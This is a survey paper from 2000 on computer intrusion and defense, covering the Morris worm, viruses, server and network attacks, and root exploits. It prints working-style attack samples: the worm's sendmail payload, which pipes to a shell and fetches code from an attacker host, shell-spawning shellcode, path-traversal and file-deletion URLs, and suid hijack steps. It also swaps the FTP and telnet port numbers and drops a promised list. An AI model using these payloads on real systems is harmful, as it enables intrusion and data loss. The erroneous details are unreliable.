Back

Computer Security: A Survey of Attacks and Defenses

Matt Mahoney, mmahoney@cs.fit.edu

Version 4, Sept. 11, 2000.

Abstract

We survey methods of computer intrusion, detection, and prevention. The problem is unsolved, but a policy of publishing source code to encourage clear box testing might help.

Introduction

Computer security is concerned with the protection of computer resources, for example, read/write access to a data file, processing time, or communication over a network link. The fundamental problem is to identify the person requesting the resource and either granting or denying access according to the wishes of the owner.

A person or client might be identified by having physical access, or by submitting a password. Single-user operating systems such as Windows 95/98 support ownership of all resources on a single computer by one person. Multiuser systems such as UNIX and Windows NT tag each resource with an owner and the rights they have assigned. An intrusion occurs when an attacker either manages to impersonate a legitimate user or obtains unintended access by exploiting an error in the operating system or controlling software.

The rate of computer intrusions is approximately doubling each year, consistent with the overall growth of the Internet. The Computer Emergency Response Team (CERT) reported 3734 incidents in 1998, 9859 in 1999, and 8836 in the first 6 months of 2000. The Attrition web site reports about 15 web page defacements per day, a number which is also doubling annually. This would account for about 3% of the CERT incidents.

A sampling of the hacked web pages archived by Attrition reveals that most attackers are motivated by ego rather than greed. Usually the page contains instructions for restoring the web site: replace index.html with index.old. Some attackers chide their victims for being careless: this is what you get for using a default password. The most prolific hackers are responsible for up to 2% of all attacks.

In a recent audit of U.S. federal agencies by the GAO, investigators were able to pierce security at nearly every system they tested (Wolf, 2000).

The rest of the paper has two main parts. First we look at some examples of attacks, and second, we look at methods of preventing, detecting, and recovering from attacks.

1. Attacks

We will look at examples of the following types of attacks.

The Internet Worm

A worm is a self-replicating program that spreads across a network automatically. The only known example of a successful worm was the Internet worm (or Morris worm, after the author was caught), which infected thousands of Sun3 and VAX computers running UNIX on Nov. 2, 1988 (Spafford, 1988). Although the security flaws that allowed it to propagate were quickly fixed, it is useful to examine it because the same types of flaws still exist in many other programs, and are used in most of the attacks that occur today.

The three security flaws the worm exploited were (1) a backdoor in the sendmail server program that allowed clients to execute remote commands on the server, (2) a buffer overflow vulnerability in the fingerd server, and (3) weak passwords. To infect another host, it exploited either of the first two flaws to run a vector program on the remote machine. The vector then opened a network connection to the infected machine to copy the worm over and run it. Once it did this it collected names of other hosts to infect and attempted to break into user accounts. The reason for this was that many users maintain accounts on more than one host and use the same password on both. This provided a third method of remote infection.

Backdoor attacks

A backdoor is a software feature (often undocumented) that bypasses the normal security mechanisms. These are often installed for maintenance purposes. The sendmail program in use on most UNIX systems at the time supported a DEBUG command that allowed mail messages to be sent to a process on the remote machine instead of to a user. The worm propagated by sending the following SMTP message to the remote mail server:
  debug
  mail from: </dev/null/>
  rcpt to: <"|sed -e '1,/^$/'d | /bin/sh ; exit 0">
  data

  cd /usr/tmp
  cat > x14481910.c <<'EOF'        (filename may vary)
  (C source code for the vector program)
  cc -o x14481910 x14481910.c;x14481910 128.32.134.16 32341 8712440;rm -f x14481910 x14481910.c

  .
  quit

The result was that the receiving host created, compiled, executed, and deleted a program mailed from the infected attacker. The attacker (at 128.32.134.16 in this example) ran a server (listening at port 32341) which accepted a password (8712440). The vector program then connected to the server, copied the VAX and Sun3 executable versions of the rest of the worm and executed the appropriate version.

The worm did not intentionally harm the host that it infected, but due to a bug, a host could become infected by hundreds or thousands of copies, exhausting memory or slowing it to the point that the machine became unusable. Rebooting removed the infection.

Buffer overflow attacks

A buffer overflow vulnerability occurs when an attacker can send a message string that overflows an array bound on the victim. Programs written in C often have these vulnerabilities, because there are no run time checks in the language, and common functions like sprintf(), scanf(), gets(), and strcpy() do not check that the destination buffer is large enough to hold the resulting string. If the buffer is on the stack (which is the case for ordinary declarations), then a long input string could overwrite the last return address that was pushed on the stack. Then when the function containing the vulnerability returns, it pops the overwritten return address and instead jumps to a location specified by the attacker. Usually this will be another location in the same input buffer that contains code written by the attacker.

The worm exploited a buffer overflow vulnerabiltiy in fingerd. The finger command is normally used to give information about a user on a remote host. For instance,

  finger jdoe@host.net
queries the fingerd server on host.net (listening on port 79), sending it the string user. The server then sends back information on jdoe, such as whether he is logged in, and the last time he read his mail.

fingerd used a call to gets() from main() to read the input into a fixed sized array. The worm sent a specially constructed 536 byte string that overwrote the return address and replaced it with a pointer to the following VAX assembly language program:

  pushl   $68732f       '/sh\0'
  pushl   $6e69622f     '/bin'
  movl    sp, r10
  pushl   $0
  pushl   $0
  pushl   r10
  pushl   $3
  movl    sp,ap
  chmk    $3b
When main() attempted to return, it executed the above code, which is equivalent to
  execve("/bin/sh", 0, 0);
This opened a shell to the attacking computer, which then infected the victim as in the sendmail attack. On the Sun3, which has a different instruction set, the code did not work and the fingerd server simply dumped core.

Password attacks

The Internet worm used password guessing to break into accounts and spread via the rsh command, as a third method of attack. In UNIX, password hashes were stored in /etc/passwd, a publicly readable file. For example, an entry might look like:

  jdoe:Sa8cyT0Fbm1Pa:123:8:John Doe:/usr/jdoe:/bin/csh
When jdoe logs in, his password is hashed using the UNIX crypt() function, and compared with the second field in the password file. If the hash matches, then he is in.

The security of the UNIX password system rests on the supposed noninvertability of crypt(). Given a hash, there is no way to recover the original password that is faster than brute force, to try all 256 possibilities and compare the hashes. In UNIX, the hash consists of encrypting a block of 64 zero bits with a 56 bit DES key derived from the last 7 bits of the 8 characters in the password. The algorithm is deliberatly made slow by repeating the operation thousands of times, and by using a minor variant of DES to thwart the use of off-the-shelf hardware DES chips. DES (Data Encryption Standard) has never been broken despite years of cryptanalysis and its details being publicly available.

As a defense against lookup table attacks, a 12-bit salt is added to the hashed password. When the user sets the password via the passwd command, the system picks a 12 bit random number and uses it to modify the hash function. The salt is then stored unencrypted in base 64 as the first two characters in the password field (Sa in this example). Then a call to crypt("password", "Sa") would return an appropriate 13 character hash. By adding a salt, a lookup table would need to store 212 = 4096 different hashes for each password.

The worm takes advantage of the fact that people choose passwords that are easy to remember, and therefore easy to guess. It first tries to derive the password from the user name. For jdoe (John Doe), it would try jdoe, jdoejdoe, John, Doe, john, doe, and eodj (jdoe backwards). Spafford notes that an earlier study showed that this works 30% of the time when users are naive about security. Then it tries a built in dictionary of 432 words: aaa, academia, aerobics, airplane, albany, albatross, albert ... woodwind, wormwood, yacov, yang, yellowstone, yosemite, zap, zimmerman. It it not known where this list came from, but it could be a list of actual passwords obtained by a sniffer, trojan, or password cracker on another system. Finally it tries all of the words in the online dictionary /usr/dict/words, including lowercase versions of capitalized words.

The crypt() system call sometimes adds a delay (0.5 to 1 second) to slow down password guessing attacks. This was not common at the time, but the worm nevertheless included its own optimized version of crypt() that was 9 times faster. Newer UNIX systems store password hashes in a file readable only by root (such as /etc/shadow) forcing password attacks to use the system call (which could also log cracking attempts). Newer UNIX systems also force users to choose better passwords by disallowing short passwords, passwords containing only lowercase letters, and variations of the user name. The most secure passwords are completely random character sequences, but these are hard to remember and are resisted by users. There are also newer secure hash functions such as MD5 or SHA1 that do not limit passwords to 8 characters. Windows NT uses MD4, a 128 bit hash function, although the user interface limits passwords to 14 characters, and they do not use a salt.

Viruses

Unlike a worm, a virus requires some action from a user to spread, usually running a program. File infectors and boot sector infectors have mostly been a problem in single-user systems. These are becoming less common, as the main method of infection -- program sharing -- has declined. The newest threat is from email viruses, which spread when the recipient runs an attached program. McAfee has identified 53,000 viruses and trojans (including minor variants) as of Sept. 2000. Compare this with the 5000 identified in 1995 by Norton (http://www.symantec.com/avcenter/reference/vb32.pdf).

Boot sector infectors

A boot sector virus infects bootable floppy disks. When the user boots from a floppy on a PC running DOS, the virus is loaded into memory as a TSR (terminate and stay resident) program. It hooks calls to DOS so that whenever another floppy disk is inserted, the virus writes a copy of itself to the inserted disk. Boot sector infectors were common in the early 1980's when many IBM PCs did not have a hard disk and had to be booted from a floppy to run DOS. The STONED virus is an example.

A boot sector virus can infect a hard drive. However, many PCs have a BIOS that warns the user if there is an attempt to write to the boot sector. There are legitimate programs which write to it as well. This feature has to be turned off when installing Windows or Linux.

File infectors

A file virus infects executable files. When a file is infected, the virus is appended to the end, and a JMP instruction is added to the beginning of the program so that the virus code is executed first. Typically, the virus searches the disk for other executable files and infects them. In order to infect another computer, an infected file has to be copied to it and then executed.

File infectors are the most common type of virus. There are thousands of variants. Some simply spread, but others may do intentional damage, such as delete all files on a certain date. Some viruses will hook DOS calls to hide themselves, so that when the infected file is read on the infected computer, it appears normal. Others are polymorphic, i.e. they make nonfunctional modifications to their offspring in order to confuse virus detection programs. One way to do this is by XORing the virus with a variable string and adding a short routine at the beginning to decrypt the rest of the code.

Ethan (http://vil.mcafee.com/dispVirus.asp?virus_k=10107&, 3/23/99) infects Microsoft Word 97 documents rather than .EXE files. When the file is viewed in Word, an embedded macro infects NORMAL.DOT, the global template file. Then when any other document is viewed, the macro in the infected NORMAL.DOT is automatically run, which infects the viewed file.

Email viruses

Email viruses are executable attachments that spread by mailing copies of themselves when the recipient runs it. The Melissa and ILOVEYOU viruses infected users of Outlook Express, the mail program distributed with Windows. When the user clicked on the attachment, the virus would read the user's address book and mail copies of itself to everyone in it.

The ILOVEYOU virus had the subject "ILOVEYOU", the message, "kindly check the attached LOVELETTER coming from me.", and an attachment LOVE-LETTER-FOR-YOU.vbs. The attachment was a program written in Visual Basic, which in addition to spreading itself, would delete files with certain extensions such as .JPG or .MP3. It would also attempt to download and run a password stealing program and email the passwords to a site in the Philippines. Victims who wouldn't normally run untrusted programs did so because the message would appear to come from someone they knew. Email filters were quickly defeated by variants of the virus that simply changed the subject, message, and name of the attachment. This virus also spread over IRC (chat). See http://vil.mcafee.com/dispVirus.asp?virus_k=98617& (5/4/2000)

The HAPPY99 virus (http://vil.mcafee.com/dispVirus.asp?virus_k=10144&, 5/6/1999) stays resident in Windows system by modifying WSOCK.DLL, Microsoft's implementation of the TCP/IP stack. Whenever the victim sends an email message, the virus sends a copy of itself to the same recipient. The virus is installed when the recipient clicks on an attachment, HAPPY99.EXE, supposedly a screen saver program that displays fireworks.

Pretty Worm (http://vil.mcafee.com/dispVirus.asp?virus_k=10144&, 6/8/1999) attempts to mail itself to everyone in the infected computer's Outlook Express address book every 30 minutes. It also searches for system information and dial up networking user names and passwords, and sends them to an IRC server. It is activated when the victim receives an email and clicks on an icon of a cartoon character from "South Park".

Server Attacks

Servers are programs that listen over the network. Nearly every type of service has been attacked. CERT has identified vulnerabilities in some versions of POP2, POP3, IMAP (mail servers), FTP (file transfer), and DNS (name service). We will examine vulnerabilities in print servers, web servers, and SMTP (mail) servers. These typically exploit buffer overflows, configuration errors, or features with unintended consequences.

Microsoft IIS 4.0 web server

Phrack 54-8 and L0pht advisory 5/7/99 identify a number of vulnerabilities in the example script pages that are installed by default with IIS, the web server included with Windows NT. These should be removed from a web site if they are not used, but many webmasters leave them in, believing them to be harmless.

The script /iissamples/exair/howitworks/codebrws.asp is supposed to show the source code of other .asp files in the examples directory. However, it does not check for /../ in the path name, so it can be used to display any file on the server, even if it is not in the web document directory. For instance, to view c:\boot.ini on www.server.com:

  http://www.server.com/iissamples/exair/howitworks/codebrws.asp?source=/../../boot.ini

Another vulnerability exists in systems that have upgraded from IIS 3.0 to 4.0 and did not remove the old scripts. Most do not work in the new version, but bdir will show the directory structure outside the public web space. For instance, the following would list all directories under C:

  http://www.server.com/scripts/iisadmin/bdir.htr??/../../

Cold Fusion web server

Cold Fusion versions 3 and 4 on all systems (NT, UNIX) has vulnerabilities described in Phrack 54-8 and L0pht advisory 4/20/99 that allow any file on the server to be read, written, or deleted when the default example scripts are left in place. For instance, the following would display and delete the indicated file:
  http://www.server.com/cfdocs/expeval/ExprCalc.cfm?OpenFilePath=c:\winnt\repair\setup.log

Both references give full details on how to exploit this vulnerability. In addition, if the sendmail.cfm script is left installed, it is possible to send mail anonymously from the server. The technique is:

  http://www.server.com/cfdocs/expeval/sendmail.cfm?MailFrom=&MailTo=&Subject=&Message=
with the appropriate fields filled in.

lpd attack

This attack allows anyone to run a process as bin (less priveliged than root, but more than the average user) on any remote system running Linux 4.x, 5.x, or 6.x. It exploits unintended features and a weak security check in the print server, lpd. Normally, when a print job is submitted, the server first checks that the client hostname is authorized by doing a reverse lookup on the IP address and comparing it to a list of authorized hosts. However, if you are running a DNS server on your system or have access to one, you can configure the reverse lookup to any name you want, including the name of the victim, which would normally be authorized.

Next, lpd has a nice feature that it will send you mail when your print job is finished. It does this by allowing you to pass options to sendmail, such as where to mail the message. One seldom-used option of sendmail is to specify a configuration file (sendmail.cf). This file can execute other commands. If you print your own sendmail.cf, and then pass the option to specify your file (which is in the print queue), you can execute any command you want on the remote system.

Full details and sample exploit code can be found at L0pht advisory 1/8/00.

Sendmail buffer overflow

Phrack 55-15 details a buffer overflow attack on Seattle Labs' sendmail version 3.2.3113 on Windows NT. The attack gives a root shell, and is similar to the Internet worm's attack on fingerd.

The reference walks the attacker through the process of disassembling the code, discovering potential vulnerabilities, and writing the exploit string. The author (known only by a pseudonym, like most who write for Phrack) notified the company before publising the exploit, but also pointed out that the program has many other vulnerabilities yet to be discovered. He berates the practice of security by obscurity, which leads developers into believing that they can hide sloppy programming by keeping the source code secret.

rpc.statd buffer overflow

Many Linux systems run RPC (remote procedure call) services to support NFS (network file system). CERT advisory CA-2000-17 reports a buffer overflow vulnerability that allows remote root access in versions of rpc.statd prior to Sept. 2000.

Client Attacks

Unlike a server attack, which is aimed at a specific target, a client attack works by waiting for victims to connect to a rogue server.

Microsoft Office 2000 UA Control

In Office 2000, the UA control (the blinking paperclip which offers user help) is improperly marked as safe for scripting. This control can be used to lower security settings, allowing other scripts delivered as HTML files from a website or as email to execute arbitrary code without warning. L0pht advisory 5/12/00 gives full details, including a sample exploit that adds a harmless entry to the registry when you click on a link.

A second vulnerability exists in CAG.EXE, a program that reads .CIL files (compressed clip art). A buffer overflow vulnerability allows a web page containing a link to a .CIL file to execute arbitrary code. L0pht advisory 3/6/00 gives details.

Microsoft Outlook

CERT reports that a buffer overflow vulnerability exists in Outlook and Outlook Express in Internet Explorer 5.0, which is installed on millions of computers. The exploit allows arbitrary code to be executed by overflowing the time zone field in the date field of the mail header. The exploit is activated when the user opens the mail, or previews it under Outlook Express. The fix is to upgrade to Internet Explorer 5.01.

Network Attacks

Network attacks are typically denial of service attacks. They may cause a remote system or server to crash, or clog the network with useless traffic.

Winnuke

The winnuke program sends a TCP packet with out-of-band (OOB) data to port 139 (nbsession) to any host on the Internet. It causes a recipient to crash with the "blue screen of death" in Windows 3.11/95/NT. (Phrack 51-16, 0x4, 1997). It was not reported whether this problem was fixed in Windows 98. OOB data is an unused and unimplemented feature of TCP/IP protocol, originally intended to interrupt a data stream with high priority data.

IRDP spoofing

IRDP is a routing protocol that allows a router to advertise a default route ("I will accept any packet with a destination address not in your routing table"). However, the protocol does not use authentication, allowing an attacker to spoof advertisements, effectively shutting off outgoing network traffic from the victim. Windows95/98/2000, SunOS, and Solaris are vulnerable. See L0pht advisory 8/19/99.

Teardrop

IP protocol allows packets to be fragmented in order to meet the size limits of the underlying data link layer (Ethernet or PPP). To support this, the IP packets contain a size field, an offset, and a flag indicating whether more fragments follow. Some systems will crash if they receive IP packets with overlapping fragments, normally an error. See Phrack 53-11 (1998).

Land

IP packets have a source and destination address (32 bits) and a source and destination port (16 bits). Some systems will crash if the source and destination address and port are the same. This would normally be an error, but is possible because TCP/IP protocol does not check whether the source address is valid. See Phrack 53-11 (1998).

One fix would be to configure a firewall to drop incoming packets if the source address is from inside the local network. This is a good idea anyway, since the address is obviously spoofed.

Ping of death

ICMP packets are special IP packets used to deliver router error messages or echo request/reply (ping). Some systems will crash if they received a fragmented ICMP packet. See Phrack 53-11 (1998). These packets are rarely fragmented because the message is typically short.

Another attack is to send a packet larger than 65,535 bytes, the maximum allowed by IP protocol. This causes many TCP/IP implementations to crash. A simple way to do this is:

  ping -l 65508 targethost
This sends a 65,536 byte packet (20 bytes IP header, 8 bytes ICMP header, and 65,508 bytes of data). The packet is fragmented by the sender, but when the receiver tries to reassemble the fragments, it overflows a buffer and crashes the kernel. See Phrack 50-3 (1997).

Smurf

An IP address ending in 0 or 255 (such as 192.115.3.0) is a broadcast address, i.e., the packet would be delivered to every host on the local network at 192.115.3.x. In a smurf attack, an ICMP ECHO REQUEST (ping) is sent to a broadcast address with the spoofed source address of the victim. This floods the victim with ICMP ECHO REPLY traffic, overloading the victim's network. See Phrack 53-11 (1998). Firewalls should be configured to reject ICMP packets with broadcast addresses, but this does not prevent attacks because the victim does not have to be on the broadcast network.

Vengeance

This program exploits a bug in some versions of inetd, which manages kernel services such as time or daytime. On these systems, a SYN followed by FIN puts inetd in an unstable state that causes it to crash during the next connection request. See Phrack 49-7 (1996).

SYN flood

A SYN flood attack (or half-open attack) is devastating because there is no way to defend against it. This was the method used to shut down several major web sites (Yahoo, Amazon, CNN, and others) for several hours in the spring of 2000.

When a TCP connection is opened, a three way handshake is used. First, a client sends a SYN packet to the server, requesting a connection. Next, the server responds with a SYN-ACK. Then the client sends an ACK along with the first data packet. In order to open the connection, the server has to store information about the client, such as its address, window size, starting sequence number, and so on. The information has to be kept in memory until either the connection is closed or reset, or the server times out waiting for the first ACK, after 75 seconds. The number of pending connections allowed varies by operating system, from 6 in Windows NT to 128 in FreeBSD 2.1.5. (Phrack 48-13, 1996).

In a SYN flood, the attacker sends a large number of SYN packets with spoofed return addresses of nonexistant hosts. This fills the queue of pending connections on the server, causing it to stop accepting new connections. Because TCP/IP lacks authentication, there is no way to distinguish spoofed packets from legitimate attempts to connect.

Local network attacks

Ethernet and cable modems are broadcast networks. This means that any traffic between a host and the first router or bridge on the local network is visible to every other host on that network. Furthermore, the other hosts can generate packets with forged source addresses. Phrack 49-7 (1996) describes two attacks that exploit these weaknesses (and supplies code). As written, either program could be traced to the offending host by examining the MAC (Ethernet) source address, with a sniffer or network analyzer. However, MAC addresses can also be forged.

SNMP attacks

SNMP (Simple Network Management Protocol) allows a network administrator to control all of the routers on a network from a central location. Phrack 50-7 describes weaknesses in the protocol that allow an intruder to access these routers in SNMP version 1. Many of these flaws have been fixed in SNMPv2 but not everyone has upgraded.

When the client (manager) wishes to configure a router, it sends a UDP packet to the server (router) with commands to set various variables. The server authenticates the message using the source IP address and the community name, which acts as a password. This protocol is vulnerable because UDP source addresses can be spoofed by an attacker, and because the community name appears in every SNMP packet and can be intercepted by a sniffer on the local network.

Root Attacks

In a root attack, a user on a multiuser system (UNIX or NT) obtains root or administrative priveliges. This allows the attacker to read or write any file, execute or stop any program, add or remove accounts, and so on. Normally, users are not allowed to access resources owned by others.

In UNIX, each file, directory, or device has an owner and associated priveliges (read, write, and execute) for the owner, group, and others. Only the owner or root can set these. When a user starts a process, only that user or root can stop it. The process has the same access rights as the user that started it. Certain programs are suid root, meaning that they have the same access rights as root even though someone else started it. These programs are necessary for operating system support, and are a major source of attacks.

All processors that support multiuser operating systems support the concept of privelige levels for processes in the hardware, and access restrictions (read, write, and execute) for memory. Intel processors (80386 and up) support 4 levels, ring 0 (highest) through ring 3 (lowest), although both NT and UNIX (Linux) use only rings 0 and 3. The operating system kernel executes in ring 0, and has full access to memory. User processes execute in ring 3, and have access only to the memory segments owned by that process or that have granted access. If a user process violates a memory access restriction or tries to increase its privelige level, then the hardware interrupts it and transfers control to the kernel (in ring 0). The kernel then handles the error, either as a segmentation fault (UNIX) or general protection fault (Windows).

NT attacks

Windows NT is vulnerable to an attack that allows a user process to run in ring 0. SoPinKy (2000) provides a short C/C++ exploit. It accesses the global descriptor table, which describes the access rights of all memory segments, and tricks the kernel into loading an attacking program as a kernel module. Once a program is in ring 0, it can do anything, such as write to kernel memory to give administrative priveliges to a user.

L0pht advisory 2/18/99 describes another vulnerability that allows a user to install a trojan kernel. The exploit involves writing into the DLL cache, which incorrectly sets the memory permissions to allow public write access. An attacker can replace the cached code with his own, then cause it to be executed by the kernel in ring 0 by calling the corresponding system function.

Greg Hoglund in (Phrack 55-5, 1999) describes a trojan kernel, a 4 byte patch that grants administrative priveliges to all users. The patch involves replacing two conditional jump instructions with unconditional jumps where the code returns the result of an access check.

An NT rootkit (a program for breaking root security) is available at www.rootkit.com. Once root is broken, an attacker can install a hidden backdoor such as NetBus or Back Orifice to control the system remotely over the network.

NT password weaknesses

The NT attacks described above require access to a user account or physical access. Phrack 50-3 (1997) describes a remote attack on NT systems running on a LANMAN network. NT, like UNIX, stores password hashes (in the registry), rather than the actual passwords, so that they cannot be read even with administrative priveliges. To avoid transmitting passwords in the clear (like most UNIX services), LANMAN hashes the password on the client and transmits the hash. However, this is even less secure. Not only can hashes be captured by a sniffer and be used to spoof a login session, but the hashes can also be read off the server.

NT also uses weaker password encryption than UNIX. For local logins, NT uses an MD4 hash of a 14 character password, but only uses a single round (allowing fast password guessing), and does not use a salt (allowing table lookup attacks). For LANMAN, the password is divided into two 56-bit blocks, and each is used as a key to encrypt a fixed value using DES (one round, unmodified, with no salt). The longer password does not allow extra security because each block can be attacked independently. After one block is guessed, it provides clues to the second block, as in elephan-------. The problem is especially severe because the second block will typically be short and easy to guess.

UNIX attacks

UNIX (including Linux) is not known to be vulnerable to ring 0 exploits. Most attacks are aimed at suid root programs, which are programs that run with root priveliges, regardless of who executes them. These programs must be carefully written to avoid inadvertently granting unintended root access. Only root can create or install a suid root program.

Shell script attacks

It is generally a bad idea to write a suid root shell script. As a simple example, suppose prog contains the following harmless looking command to list the contents of the /tmp directory, which is normally publicly readable anyway.
  ls /tmp
An attacker could do:
  cp /bin/sh ./ls
  PATH=.:$PATH
  prog
and execute arbitrary commands in the shell named ls as root. As a defense against this, the programmer could use an absolute path:
  /bin/ls /tmp
but then a more subtle attack exists:
  IFS='/'
  cp /bin/sh ./bin
  prog
Setting the IFS variable instructs prog to treat the '/' character as a space. Thus, the command in prog appears as:
  bin 'ls tmp'
which executes the program named bin in the attacker's current directory with root priveliges.

These are very simple examples of attacks. There are many others, and most are much more sophisticated than this. For this reason, suid root shell scripts are always considered risky. But the equivalent program compiled in C:

  system("/bin/ls /tmp");
would also be vulnerable to the same attacks.

Dynamic library attacks

By default, when a program is compiled and linked, it uses shared libraries (such as libc.so) in order to make the executable file smaller. When the program is run, it looks in a few standard directories for the shared libraries, loads them, and begins executing. The LD_LIBRARY_PATH environment variable tells the loader where to look. Thus,

  LD_LIBRARY_PATH=.:/usr/lib
would tell the loader to look for libc.so first in the current directory. If the attacker happened to have his own version in which, say, printf() was modified, then when the suid root program made a call to printf(), it would execute the attacker's code as root.

Similar attacks are possible by setting LD_PRELOAD (Phrack 51-8, 1997) or by ELF PLT infection (Phrack 56-7, 2000). The defense against this is to statically link the libraries.

Directory tree escapes

Redhat Linux 6.x has two suid root programs pam and userhelper. Both programs read secure files specified by the user out of a subdirectory, but incorrectly allow /../ in the pathnames to escape this directory. The attacker writes a rogue pam.d file that references a second rogue file which contains commands executed by userhelper. The result is that an attacker can cause an arbitrary program to run as root. See L0pht advisory 1/4/00.

Symbolic links in /tmp

The default login script for Redhat Linux 6.1 users has a section of code where it copies a temporary script file to /tmp, executes it, and deletes it. If a second user places a symbolic link where the temporary would go, and sets the permissions to read and execute only, then the creation will fail, but the execution will succeed in running the attack program as the first user (which could be root). See L0pht advisory 12/27/99.

L0pht advisory 1/8/99 shows how many programs are potentially vulnerable to symbolic links in /tmp. This directory is shared by many programs, some running as root. Phrack 52-6 (1998) gives a Linux patch that disables symbolic links in /tmp, which seem to have no legitimate purpose.

Console attacks

If an attacker has physical access, little can be done. Some systems can store a password in EEPROM (memory that retains its value when the power is turned off) so that an attacker cannot gain root access by rebooting in single user mode.

Phrack 53-9 (1998) shows how to gain root access at a Sparcstation console. The L1-A keys are used to interrupt the system, and then a simple FORTH program is used to modify kernel memory to grant root priveliges. This method would bypass an EEPROM password.

Password Capture

We have already seen how the Internet worm broke into user accounts by password guessing. UNIX stores password hashes that cannot be read, even by root, but is still vulnerable to the tendency of people to choose passwords that are easy to remember (and guess). A number of password cracking programs are available, such as L0phtcrack (L0pht), or Quackenbush Password Appraiser (www.quackenbush.com) (but see L0pht advisory 1/21/99. They found that hashes and passwords were transmitted unencrypted to and from the website running the program).

Sniffer attacks

Another type of attack is to intercept passwords as users log in to a telnet or FTP session, or to an insecure web site (beginning with http:// rather than https://). These passwords are transmitted unencrypted across the network and can be captured by a sniffer, a program that reads IP packets not addressed to the host that it runs on. The data is visible to every system connected to any broadcast link (Ethernet or cable TV) between the client and server. On these networks, an IP packet is broadcast to every host on the local network, and is supposed to be ignored if the destination address does not match. There is no way to remotely detect whether a sniffer is running on a network.

A packet sniffer for Linux called Juggernaut is available at Pharck 50-6 (1997). It has additional capabilities, such as being able to interrupt or hijack a telnet session from any client on the local network by inserting a TCP packet with a spoofed source address to the server.

Weak encryption

Secure web sites (those beginning with https://) encrypt all communication between the server and browser as a protection against sniffers. However, because of U.S. export control laws, some older browsers and servers (including some in the U.S.) use deliberately weakened encryption limited to 40 or 56 bit keys. These are subject to brute force attacks, although with 56 bits, such an attack requires weeks of computer time with thousands of processors.

A vulnerability exists in older versions of Netscape due to a weak random number generation algorithm based on a hash of the system clock. To communicate with a secure web site, a browser generates an RSA secret and public key, and transmits the public key to the server. The server can then encrypt data using the public key, and the browser decrypts it with the private key. RSA is believed to be fundamentally secure, in that an attacker cannot decrypt the data without the private key, and cannot derive the private key from the public key. The flaw lays in the algorithm for randomly generating the keys. An attacker could create private/public key pairs using random numbers generated from around the time that the message was sent.

A similar vulnerability exists in PGP 5.0 under certain circumstances. See CERT advisory CA-2000-09.

Generating cryptographcally secure (i.e. unguessable) random numbers on a computer is a difficult problem. Computers are deterministic, so the solution often involves special hardware that derives data from an unpredictable physical process. Some products, such as PGP, ask the user to type some keys or move the mouse, and use the timing of the keystrokes or mouse movements to generate random numbers.

There is a theoretical possibility that RSA or any other encryption method could be broken. The security of RSA depends on the lack of a fast algorithm for factoring large numbers with hundreds of digits. Although many have tried to find such an algorithm and failed, there is no proof that no such algorithm exists. This is true of all of the widely used encryption methods. The best we can do is make the details public so that as many people as possible can try to break them. Their security rests entirely on the secrecy of the key, not the algorithm.

Trojan attacks

This method tricks the user into entering her password into a legitimate looking program. One scam involved PayPal, an online payment system. Victims were notified by email that they had received a payment. When they clicked on the accompanying link to PayPaI.com (note the uppercase i in place of the l), they were brought to a website that looked like the PayPal website, but instead simply captured the victims' passwords when they logged in. The attacker could then use the password to access the victim's account.

Backdoor passwords

Software developers sometimes add undocumented passwords for maintenance purposes. We have already seen how the Internet worm exploited a backdoor in 1988, but the practice continues. Developers believe that backdoors cannot be discovered if only the binary executable is distributed, but these programs can still be analyzed with a disassembler and debugger. Phrack 55-15 gives practical advice for selecting the appropriate tools.

L0pht advisory 5/9/00 describes a password attack on the Intel NetStructure 7110 and 7180 high performance servers. The default root password is derived from a hash of the MAC (Ethernet) address. Many users leave this unchanged because they believe it to be secure, because the MAC address is different on every server and cannot normally be read remotely. However, the advisory notes that the MAC address can be read using SNMPwalk.

Stored passwords

There is no secure way to store a password on a client machine. However, software developers sometimes forget this, and attempt to store encrypted passwords so that the user does not have to type it in every time. This is insecure, because an attacker with access to the client can retrieve the password regardless of the encryption method used. No matter how strong the encryption method, the program for decrypting it must be stored on the client where it is available to the attacker.

NetZero, a free Internet service, uses a simple substitution cipher to store passwords. L0pht advisory 7/18/00 includes a program for decrypting them. Phrack 53-9 (1998) has a program for decrypting passwords on the Cisco 7 router.

Hardware key attacks

Because passwords cannot be stored securely, there are removable devices that store passwords or other user data. These devices can also be used for software copy protection. Security depends on the difficulty of cloning a device by copying the data in it. L0pht describes two such devices and how they can be attacked.

The Aladdin eTokin is about the size of a key and plugs into a USB port. L0pht advisory 5/4/00 shows how the key can be opened and the contents of EEPROM memory can be read with a device programmer without removing the chip from the circuit board. They state that EEPROM programmers can be bought for $25 to $1000, or built for about $10. They recommend sealing the circuit board in epoxy to make tampering easier to detect.

The iKey 1000 USB token by Rainbow Technologies uses software encryption to protect its internal data. However, L0pht advisory 7/20/00 details how the administrative password can be set to its default value with a device programmer so that the data can be retrieved.

2. Defenses

In section 1, we looked at just a few examples of attacks. There are many others, of course. The point was to show that computer security is enormously difficult. It is like trying to secure a building with thousands of doors and windows, each with a different type of lock. An attacker can break down a door (buffer overflow attack), pick a lock (exploit a software error), steal a key (password attack), find an open window (configuration error), or burn down the building (denial of service attack). There is no simple solution to this problem, and as systems get more complex, it will get worse. However, there are some things we can do.

Comparison of Operating Systems

According to Attrition, 63% of hacked web sites between Aug. 1999 and June 2000 were running Windows NT, with most of the remainder running variations of UNIX (17% Linux, 10% Solaris, 7% BSD, 4% others). However, among web servers overall, only 20% (Netcraft) or 28% (Security Space) were using NT-based servers in June 2000. This means that a website running under Windows NT is 4.3 to 6.8 times as likely to be attacked as a UNIX system.

There are at least three possible reasons for this difference. One is that NT is newer, and therefore may have more bugs. Another is that NT may be easier to use, and therefore favored by people who are less likely to be aware of security issues. A third possibility is that source code is publicly available for UNIX but not NT. Anyone can analyze the source code for UNIX, find security flaws, and contribute fixes. Most security flaws are discovered by "white hat" hackers, who choose to publish their findings and/or notify the developers. Publishing the source code makes their job easier.

Securing UNIX

Curry (1990) gives useful advice in making UNIX secure. Most of it is still applicable ten years later.

For greater security, any network service not absolutely needed, such as finger, time, daytime, echo, chargen, null, etc. should be turned off. These services could also be filtered by a firewall.

Phrack 52-6 (1998) has patches to make Linux more secure. These involve modifying the kernel. These will:

Firewalls

Most firewalls operate at the network (IP) level. They either pass or drop packets based on the source and destination IP addresses and port numbers. A firewall should be configured to deny all services not needed. A typical configuration might allow incoming traffic on port 25 (SMTP) addressed to the mail server, and port 80 (HTTP) addressed to the web server. Remote login (port 21) and FTP (port 23) might be allowed only from specific IP addresses, although this precludes dialup connections.

